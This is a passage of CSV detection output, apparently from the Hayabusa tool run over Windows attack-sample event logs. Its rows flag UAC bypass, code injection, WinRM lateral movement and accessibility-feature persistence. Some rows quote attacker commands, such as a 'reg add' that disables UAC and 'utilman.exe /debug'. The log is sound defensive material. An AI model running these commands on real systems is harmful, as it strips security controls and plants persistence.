+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.470 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 312 0197CDB0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k 
netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.814 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,PowerShell Network 
Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx +2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\WinrsHost.exe -Embedding : Path: C:\Windows\System32\winrshost.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /C ipconfig : Path: C:\Windows\System32\cmd.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\WinrsHost.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: ipconfig : Path: C:\Windows\System32\ipconfig.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\cmd.exe /C ipconfig,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:38:19.630 
+09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: Lateral Movement - Windows Remote Management : Command: ""C:\Windows\system32\HOSTNAME.EXE"" : Path: C:\Windows\System32\HOSTNAME.EXE : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\wsmprovhost.exe -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1112,technique_name=Modify Registry : Command: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f : Path: C:\Windows\System32\reg.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: whoami : Path: 
C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\osk.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Suspicious Remote Thread 